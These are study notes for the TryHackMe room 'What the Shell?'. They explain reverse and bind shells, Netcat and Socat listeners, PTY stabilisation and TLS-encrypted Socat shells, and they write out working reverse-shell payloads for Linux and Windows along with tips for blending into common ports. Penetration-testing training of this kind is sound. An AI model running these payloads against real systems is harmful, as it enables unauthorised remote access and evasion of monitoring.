What the Shell? TryHackMe

Overview

This room explains what shells are in an exploitation context and focuses on the practical tools and techniques used to catch, upgrade, and stabilize them. It covers reverse shells, bind shells, interactivity problems, Netcat, Socat, and encrypted shell handling.

Core idea: getting code execution is only the start. The real difference in usability comes from whether the shell is reverse or bind, interactive or non-interactive, and whether you can stabilize it into something reliable.

1) What a Shell Is

A shell is a command-line interface used to interact with an operating system, such as bash, sh, cmd.exe, or PowerShell.

In exploitation, the goal is often to turn an initial vulnerability into a remote shell so you can execute commands on the target system.

2) Reverse Shell vs Bind Shell

Reverse shell: the target connects back to your listener. This is usually easier and more common during labs and CTF-style scenarios.
Bind shell: the target opens a listening port and you connect into it. This avoids listener exposure on your side, but target firewalls may block it.

Rule of thumb: reverse shells are usually easier to execute and debug, while bind shells are more situational.

3) Interactive vs Non-Interactive Shells

The room makes an important distinction between shell quality:

Interactive shells: support prompts, command-line editing, and tools that expect a full TTY.
Non-interactive shells: can run simple commands, but interactive programs such as ssh, editors, and some prompts will break or behave badly.

This is why shell stabilization matters so much after the initial callback lands.

4) Core Tools

The room centers around four main tools:

Netcat: simple and widely available, but unstable by default.
Socat: more capable and often more stable, but less common on targets and harder to type correctly.
Metasploit multi/handler: useful for staged payloads, Meterpreter, and more controlled shell handling.
Msfvenom: payload generation tool for reverse and bind payloads.

5) Netcat Basics

Netcat is the baseline tool for sending and receiving shells.

Listener: nc -lvnp <port>
Connect to a bind shell: nc <target-ip> <port>
Using ports like 80, 443, or 53 can help outbound traffic blend in.

Netcat is widely available, but the default shell experience is weak and fragile.

6) Netcat Shell Stabilization

The room presents three practical stabilization approaches:

Python PTY: python -c 'import pty;pty.spawn("/bin/bash")', followed by export TERM=xterm and then stty raw -echo; fg after backgrounding the shell.
rlwrap: rlwrap nc -lvnp <port> for history, arrow keys, and better usability, especially on Windows shells.
Socat upgrade: use an initial shell to transfer or launch Socat for a more fully interactive session.

Common recovery trick: if terminal echo gets messed up after using stty raw -echo, type reset and press Enter.

7) TTY Size Fixes

Programs like editors can break if the shell has the wrong terminal dimensions.

Check your local size with stty -a.
Then set the remote shell with stty rows <num> and stty cols <num>.

This small step makes a big difference when using full-screen tools.

8) Socat Basics

Socat acts like a flexible connector between two endpoints and is stronger than Netcat once you know the syntax.

Basic reverse listener: socat TCP-L:<port> -
Linux reverse shell payload: socat TCP:<attacker-ip>:<port> EXEC:"bash -li"
Windows reverse shell payload: socat TCP:<attacker-ip>:<port> EXEC:powershell.exe,pipes
Bind shell connect: socat TCP:<target-ip>:<target-port> -

9) Fully Stable Socat TTY Shell

One of the most useful Linux-only techniques in the room is the fully interactive TTY reverse shell using Socat.

Listener: socat TCP-L:<port> FILE:`tty`,raw,echo=0
Target: socat TCP:<attacker-ip>:<port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

This gives a much better shell because it allocates a pseudoterminal, passes signals correctly, and makes the session behave like a real TTY.

10) Encrypted Socat Shells

Socat can also wrap shells in TLS, which makes the traffic encrypted and harder to inspect.

Generate a certificate with openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
Combine them with cat shell.key shell.crt > shell.pem
Use OPENSSL-LISTEN instead of TCP-L on the listener.
Use OPENSSL:<ip>:<port>,verify=0 on the connecting side.

Important detail: the certificate must be present on whichever side is acting as the listener.

Exam Notes (PT1)

Know the difference between reverse shells and bind shells, and why reverse shells are more common in practice.
Most simple shells are non-interactive, which breaks many useful commands and tools.
Netcat is common and simple; Socat is stronger and can provide a fully interactive Linux TTY shell.
The classic Linux stabilization path is Python PTY, export TERM=xterm, then stty raw -echo; fg.
Socat can also create encrypted shells using OPENSSL-LISTEN and a generated certificate.